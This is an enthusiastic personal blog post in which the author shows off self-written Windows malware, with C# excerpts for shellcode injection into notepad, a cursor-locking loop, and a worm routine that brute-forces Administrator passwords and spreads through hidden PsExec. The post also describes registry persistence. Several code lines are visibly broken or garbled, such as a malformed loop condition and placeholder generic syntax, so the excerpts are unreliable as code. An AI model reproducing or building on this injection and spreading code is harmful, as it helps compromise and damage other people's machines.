finishing up some malware!!!
posted on : 7/13/2024
helllo evertt1 today i bring you. finihsed
malware. i love malwre!!! anwaaays it can be
found
here
. do go visit, give me a star, repsot, reblog!!!
idk. anyways lets get into what it odes!
here are the steps in the program!!
step 1: it writes itself to the registry to run
on boot
step 2: it will open notepad as a process and
then inject shellcode to spawn a messagebox
step 3: it attempts to spread itself to other
machines!!
step 4: finally, it will lock the cursor in
place and prevent users from moving it around.
some code analysis!
some of my more proud parts are this:
static bool UnsfInj(IntPtr h)
{
IntPtr memAlloc = VirtualAllocEx(h, IntPtr.Zero, Buf.Length, 0x00001000, 0x40);
UIntPtr outout;
WriteProcessMemory(h, memAlloc , Buf, (uint)(Buf.Length), out outout);
if (CreateRemoteThread(h, IntPtr.Zero, 0, memAlloc , IntPtr.Zero, 0,IntPtr.Zero) != IntPtr.Zero)
{
Console.Write("injection complete!");
return true;
}
else
{
Console.Write("injection failed");
return false;
}
}
}
this function injects shellcode which i think is
just amwazing....i lvoe shellcode make some
noise!!
here's how i locked the cursor. its shrimple.
while (1==1)
{
Console.SetCursorPosition(0,0 );
if (Console.ReadKey().Key != ConsoleKey.K && Console.ReadKey().Key != ConsoleKey.Enter)
{
break;
}
}
the break is in tehre for testing purposes. i am
stilll testing this mofo. tring to get a
environment where i can bc my virutal machines
hate me.
okay next is some misc piexes thati loved
private static async Task (carat) bool Spread(List string adrs, IEnumerable string pwl, string path)
{
using (TcpClient tcl = new TcpClient ())
{
for (int i = 0; i = adrs.Count; i++)
{
try
{
byte[] bytes = Encoding.ASCII.GetBytes(adrs[i]);
IPAddress nadr = new IPAddress(bytes);
IPEndPoint edp = new IPEndPoint(nadr, 135);
await tcl.ConnectAsync(edp);
foreach (string line in pwl)
{
string arguments = $@"\\{adrs[i]} -u Administrator -p {line} -c -csrc ""{path} gigas.exe";
ProcessStartInfo psi = new ProcessStartInfo
{
FileName = "C:\\Windows\\System32\\PsExec.exe",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true
};
using (Process proc = Process.Start(psi))
{
proc.WaitForExit();
}
}
return true;
}
catch
{
return false;
}
}
}
i hearted this part!! it spwawns psedxec :3
anyways tahts all for now gootbye. tune in later
when i recode this into rust or go (vote in the
cmtts belowwww)
